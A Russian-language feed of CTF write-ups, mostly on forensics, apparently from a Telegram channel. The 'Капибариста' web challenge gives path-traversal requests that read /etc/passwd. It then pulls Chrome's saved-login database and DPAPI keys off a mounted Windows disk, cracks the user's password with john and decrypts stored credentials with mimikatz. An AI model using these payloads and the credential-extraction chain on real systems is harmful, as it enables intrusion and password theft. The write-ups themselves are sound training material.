Представляем вашему вниманию два развернутых райтапа на интересную форензику с недавнего HTB Cyber Apocalypse CTF 2025 от ТОП-10 на Codeby Games:

• A New Hire (very easy difficulty)
• Cave Expedition (medium difficulty)

Автор: @Rean1mat0r

#htb #cyberapocalypsectf #forensics

А вот и еще два развернутых райтапa на форензику с недавнего HTB Cyber Apocalypse CTF 2025 от @Rean1mat0r. Давайте поддержим реакциями, Саня старался!

• Silent Trap (easy difficulty)
• Stealth Invasion (easy difficulty)

#htb #cyberapocalypsectf #forensics

#misc #forensics
Капибариста

1) Идем на сайт и видим форму с логином. Креды нам не даны, поэтому тыкаем по единственной доступной кнопке - политике о персональных данных. Попадаем на URL:
https://t-barista-adminfilestorage-XXXXXX.spbctf.org/?path=/policy.pdf&action=download
2) Пробуем поменять путь и убрать тег action:

GET /?path=/../../../../../../../../../../../etc/passwd HTTP/2

В ответ получаем:

<html lang=en>
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>Попытка взлома</p>

Ага... А если убрать тег action?

GET /?path=/ HTTP/2

Попадаем в файловый менеджер в вебе!
Однако ничего интересного в текущей папке не находим. Пробуем выбраться при помощи следующего пейлоада:

GET /?path=/./../ HTTP/2

Вылетаем в корневую директорию, кайф
Можем считать /etc/passwd:

GET /?path=/./../etc/passwd HTTP/2

Ответ:

<textarea cols="80" rows="25">root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
</textarea>

Пропустим момент с бесконечными поисками интересных файлов и перейдем к сути: в /mnt примонтирован виндовый диск C:
3) Находим интересные приложения на диске C:

GET /?path=/./../mnt/C/Users/capybarman/AppData/Local/Google/Chrome HTTP/2

По этому пути узнаем, что в системе стоит Chrome. А значит, там может быть сохранена кука для авторизации на сайте!
Забираем SQLite базу данных со всеми кредами хрома:

GET /?path=/./../mnt/C/Users/capybarman/AppData/Local/Google/Chrome/User+Data/Default/Login+Data HTTP/2

База данных на ОС Windows зашифрована так называемым masterkey, который мы можем достать по пути

GET /?path=/./../mnt/C/Users/capybarman/AppData/Roaming/Microsoft/Protect//S-1-5-21-1023654651-2831612651-3133783694-1000/c637715b-e447-4cd5-9a72-445ef3861446 HTTP/2

Однако не все так просто - masterkey в свою очередь зашифрован паролем пользователя. Поэтому используем утилиту DPAPImk2john и сбрутим хеш:

python3 DPAPImk2john.py --sid="S-1-5-21-1023654651-2831612651-3133783694-1000" --masterkey="c637715b-e447-4cd5-9a72-445ef3861446" context="local" > hash.txt

Ну и запустим john со словарем rockyou.txt на полученный хеш. Получим пароль Capybara1792
4) Для расшифровки masterkey запустим утилиту mimikatz и выполним:

dpapi::masterkey /in:"c637715b-e447-4cd5-9a72-445ef3861446" /sid:"S-1-5-21-1023654651-2831612651-3133783694-1000" /password:"Capybara1792" /protected

В самом низу будет наш masterkey.
5) Расшифруем ключ при помощи полученного masterkey, также используя mimikatz. Для начала вытащим сам зашифрованный ключ:

GET /?path=/./../mnt/C/Users/capybarman/AppData/Local/Google/Chrome/User+Data/Local+State HTTP/2

Он будет находиться по ключу os_crypt.enrypted_key в JSON файле по пути выше. Также перед записью в файл его надо декодировать из base64 и убрать первые 5 символов из раскодированного значения - DPAPI. Сохраним результат в файл dec_data
Запускаем mimikatz и вводим:

dpapi::blob /masterkey:MASTERKEY_FROM_4_STEP /in:"dec_data" /out:"aes.dec"

6) Теперь надо вынуть password из вытащенной на 3 этапе базы данных

SELECT origin_url, username_value, password_value FROM logins

И расшифровать при помощи полученного AES-ключа (можно использовать этот скрипт, например)
7) Получаем пароль OmgSoAdminPasswordVerySecure2025 с логином admin,  авторизуемся на сайте, отключаем опцию "только соевое молоко", наслаждаемся анимацией и получаем флаг!

Автор: @ll0ydik

Where is my Pony? NullByte Eternal Games Writeup от @Max_RSC

Без лишних предисловий перейдем к делу.

Нам дали какой-то flashdrive. На всякий случай сделаем strings: вдруг флаг лежит в открытом виде?

strings flashdrive | grep -i X0G4M3

# Вывод:

X0G4M3{Th1s_1S_N0t_MY_B3l0v3D_P0nY}

Фейк! Почему я не удивлен :D

Кидаем в file, чтобы понять, что представляет собой этот файл:

file flashdrive

# Вывод: 
flashdrive: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "mkfs.fat", sectors/cluster 8, Media descriptor 0xf8, sectors/track 32, heads 64, hidden sectors 26116096, sectors 4192256 (volumes > 32 MB), FAT (32 bit), sectors/FAT 4088, reserved 0x1, serial number 0xd873f71c, unlabeled

Окей, это образ флешки. FAT32, куча секторов, скрытых разделов — в общем, все как обычно: у @CyberFazaN легко не бывает.

Чтобы посмотреть, что на флешке, воспользуемся утилиткой fls из пакета sleuthkit:

fls -r -f fat32 -o 0 flashdrive

# Вывод:

DO_NOT_OPEN/ # ну конечно, сразу хочется туда залезть!

MyBelovedVideo.mp4 # подозрительно милое название...

wallpaper.png # вряд ли это интересно

.hidden # о, папочка с секретиками!

.NotThat.jpg # классика: "это не то, что ты ищешь" (скорее всего, как раз именно то)

______~1.PNG # похоже на битую картинку

LOOOOOOOVEEEEEEEE.txt # это явно не просто текстовик...

Берем icat из пакета sleuthkit и начинаем вытаскивать все подряд:

icat -o 0 flashdrive 135 > MyBelovedVideo.mp4

icat -o 0 flashdrive 6 > wallpaper.png

# и так далее...

Файл LOOOOOOOVEEEEEEEE.txt выглядит как текстовый, но...

file LOOOOOOOVEEEEEEEE.txt

# Вывод:

LOOOOOOOOOOOOOOOVEEEEEEEEEEEEEE.txt: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "Nice", progressive, precision 8, 720x850, components 3

Оказывается, это JPEG. Переименовываем:

mv LOOOOOOOOOOOOOOOVEEEEEEEEEEEEEE.txt LOOOOOOOOOOOOOOOVEEEEEEEEEEEEEE.jpg

Открываем картинку:

eog LOOOOOOOOOOOOOOOVEEEEEEEEEEEEEE.jpg

Видим флаг.

Ссылка на задание

#forensics #NullByte #NBGames #writeup

FreeHackQuest - admin_vol.1. Writeup от @Max_RSC

Задача — имея образ виртуального диска Mik.vdi, найти информацию о злоумышленнике, про которого известно, что он очень любит "Матрицу" и "Алису в стране чудес". 

Подключаем диск Mik.vdi к виртуалке с Kali Linux и загружаемся. После старта в /media/kali видим два смонтированных раздела: system и system1. 

Раз есть "Матрица", значит, наверняка есть Нео. Предположим, что n30 – один из пользователей этой системы. Пробуем поискать информацию по ключевому слову n30:

grep -i n30 -r /media/kali/system  

Ничего интересного. Хорошо, теперь поищем в system1:

grep -i n30 -r /media/kali/system1  

Получаем зацепку и начинаем копать более прицельно:

grep -ai n30 -r /media/kali/system1/rw/store/user.dat  
 

Ключик -a заставляет grep рассматривать файл как текстовый, даже если это бинарный файл.

В результате натыкаемся на пользователя whiterabbit, а рядом — флаг.

"whiterabbit" — это явная отсылка одновременно и к "Алисе" и к "Матрице", так что можно было сразу грепать и по "white", и по "rabbit". Разумеется, при условии, что кибератлет достаточно эрудирован и уловил отсылку из условия задачи.

#admin #forensics #fhq #writeup